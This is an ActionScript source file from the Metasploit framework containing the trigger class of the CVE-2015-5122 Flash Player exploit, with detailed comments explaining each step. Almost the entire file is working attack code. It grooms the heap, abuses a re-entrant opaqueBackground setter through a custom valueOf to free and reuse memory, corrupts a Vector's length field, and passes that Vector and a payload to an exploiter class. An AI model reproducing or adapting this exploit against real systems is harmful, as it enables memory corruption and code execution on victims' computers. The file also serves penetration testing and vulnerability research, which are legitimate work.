metasploit-framework/external/source/exploits/CVE-2015-5122/MyClass.as


package
{
import flash.display.DisplayObjectContainer;
import flash.utils.ByteArray;
import flash.system.Capabilities;
import flash.events.MouseEvent;
import flash.external.ExternalInterface;
import flash.text.*;
import flash.text.*;
import flash.text.engine.*;
public class MyClass
{
// Trigger class of the CVE-2015-5122 reference exploit (Flash Player, per the
// file path). Nothing in here is reusable library code: every allocation is a
// piece of a deliberate heap layout, so statement order, loop bounds and
// allocation sizes are load-bearing and must not be reordered or "tidied".
// From a defensive standpoint the identifying sequence is: install a custom
// valueOf on MyClass.prototype, then assign that object to
// TextLine.opaqueBackground so the setter re-enters user code (see TryExpl and
// valueOf2). The only real mitigation is the vendor patch / removing the
// Flash runtime.
static var
// _gc keeps strong references to every groomed array so they survive GC
// between attempts (TryExpl pushes _ar onto it).
_gc:Array,
// _ar is the groomed array, split into three index ranges by TryExpl:
//   [0, _arLen1)        Vector.<uint>(_vLen) filler objects
//   [_arLen1, _arLen2)  TextLine objects
//   [_arLen2, _arLen)   Vector.<uint>(8), element 0 = own index in _ar
_ar:Array,
_arLen1:int,
_arLen2:int,
_arLen:int,
// _vu ends up pointing at the Vector whose length field was corrupted; it is
// what gets handed to Exploiter.
_vu:Vector.<uint>,
// _vo, _tl, _is64, _chrome, _done and _magic are declared but never read or
// written anywhere in this file.
_vo:Vector.<Object>,
// _tb: shared TextBlock used to create and recreate the TextLines.
_tb:TextBlock,
_tl:TextLine,
// _mc: the MyClass instance whose valueOf is redirected to valueOf2.
_mc:MyClass,
_is64 = null, // untyped (defaults to *) — unused
_chrome:Boolean,
_done:Boolean,
// _cnt: index in _ar of the TextLine currently being assigned; advanced by
// valueOf2 on each re-entry.
_cnt:int,
// _vLen: element count of the 400-byte filler Vectors (400/4 minus 2,
// presumably leaving room for the Vector header — not confirmed here).
_vLen:int,
_magic:uint = 0x123456,
// LEN40 is both the value written into a corrupted length field and the
// threshold TryExpl uses to decide that corruption succeeded.
LEN40:uint = 0x40000000;
// Callback that TryExpl installs as MyClass.prototype.valueOf. It runs when
// the opaqueBackground setter coerces _mc to a number. While _cnt < _arLen2 it
// re-enters the setter for the next TextLine in _ar (recursion through the
// setter); on the deepest call it frees five TextLines via recreateTextLine
// and then resizes the trailing small Vectors to _vLen so their new backing
// stores are allocated into the freed space.
// Returns _vLen+8, which is what the setter ends up storing. Any Error is
// caught and only logged, so a failure here is invisible to TryExpl.
static function valueOf2()
{
try
{
if (++_cnt < _arLen2) {
// recursive call for next TextLine
_ar[_cnt].opaqueBackground = _mc;
} else {
Logger.log("MyClass.valueOf2()");
// free internal objects
for(var i:int=1; i <= 5; i++)
_tb.recreateTextLine(_ar[_arLen2-i]);
// reuse freed memory
for(i=_arLen2; i < _arLen; i++)
_ar[i].length = _vLen;
}
}
catch (e:Error)
{
Logger.log("valueOf2 " + e.toString());
}
return _vLen+8;
}
// One exploitation attempt. e, platform, os and payload are passed straight
// through to Exploiter; the only state produced here is the corrupted Vector
// _vu. Returns nothing and does not report success: the "try again" Error
// thrown when no length corruption is detected is caught by the catch below
// and merely logged, so a caller cannot distinguish success from failure
// except through Logger output. The local `exploiter` is never used after
// construction; Exploiter's constructor side effects are presumably what
// matters — confirm in Exploiter.as.
static function TryExpl(e:Exploit, platform:String, os:String, payload:ByteArray)
{
try
{
// init vars
Logger.log("init vars")
_arLen1 = 10 * 3; // 10 vectors per page
_arLen2 = _arLen1 + 4 * 4; // 4 TextLine per page
_arLen = _arLen2 + 10 * 8;
_ar = new Array(_arLen);
if (!_gc) _gc = new Array();
_gc.push(_ar);
if (!_tb) {
// _tb is created once and reused across attempts (it is static).
_tb = new TextBlock(new TextElement("TextElement", new ElementFormat()));
if (!_tb) throw new Error("_tb = " + _tb);
}
_mc = new MyClass();
_vLen = 400/4-2;
// fill 400-byte holes (400 is factor of 0x320(800) opaqueBackground corruption offset)
Logger.log("fill 400-byte holes (400 is factor of 0x320(800) opaqueBackground corruption offset)")
for(var i:int; i < _arLen1; i++)
_ar[i] = new Vector.<uint>(_vLen);
// prepare Vector objects
Logger.log("prepare Vector objects")
for(i=_arLen2; i < _arLen; i++){
_ar[i] = new Vector.<uint>(8);
// element 0 records the Vector's own index so a neighbour can be located
// later via _vu[_vLen+2] once a length field has been corrupted.
_ar[i][0] = i;
}
// prepare TextLines
Logger.log("prepare TextLines")
for(i=_arLen1; i < _arLen2; i++)
_ar[i] = _tb.createTextLine();
// fill 1016-byte holes (0x38c is a size of internal TextLine object)
Logger.log("fill 1016-byte holes (0x38c is a size of internal TextLine object)")
for(i=_arLen1; i < _arLen2; i++)
_ar[i].opaqueBackground = 1; // alloc 1016 bytes
// set custom valueOf() for _mc
Logger.log("set custom valueOf() for _mc")
// Prototype-level override: from here on, any numeric coercion of a
// MyClass instance runs valueOf2. This is the re-entrancy hook the
// vulnerable setter does not guard against.
MyClass.prototype.valueOf = valueOf2;
// here we go, call the vulnerable setter
Logger.log("here we go, call the vulnerable setter")
// Start six TextLines before the end of the TextLine range; valueOf2
// walks _cnt forward from here.
_cnt = _arLen2-6;
_ar[_cnt].opaqueBackground = _mc;
// find corrupted vector length
Logger.log("find corrupted vector length ")
// Scan the small Vectors: any whose length exceeds its nominal size has had
// its length field overwritten. If none is found, _vu is left pointing at
// the last element and the length check below throws.
for(i=_arLen2; i < _arLen; i++) {
_vu = _ar[i];
if (_vu.length > _vLen+2) {
Logger.log("ar["+i.toString()+"].length = " + _vu.length.toString(16));
Logger.log("ar["+i.toString()+"]["+_vLen.toString(16)+"] = " + _vu[_vLen].toString(16));
if (_vu[_vLen] == _vLen) {
// corrupt next vector
_vu[_vLen] = LEN40;
// get corrupted vector
// _vu[_vLen+2] is read as the neighbour's stored index (see element 0
// initialisation above) — relies on adjacency, which is assumed not proven.
_vu = _ar[_vu[_vLen+2]];
break;
}
};// else CheckCorrupted(_vu, i); // 4RnD
}
// check results
Logger.log("v.length = " + _vu.length.toString(16));
// Failure path: caught below and only logged (see function comment).
if (_vu.length < LEN40) throw new Error("try again");
var exploiter:Exploiter = new Exploiter(e, platform, os, payload, _vu, 0x62)
// clean up
Logger.log("_vu.length = " + _vu.length.toString(16));
}
catch (e:Error)
{
// Note: this `e` shadows the Exploit parameter `e` within the catch block.
Logger.log("TryExpl " + e.toString());
}
}
}
}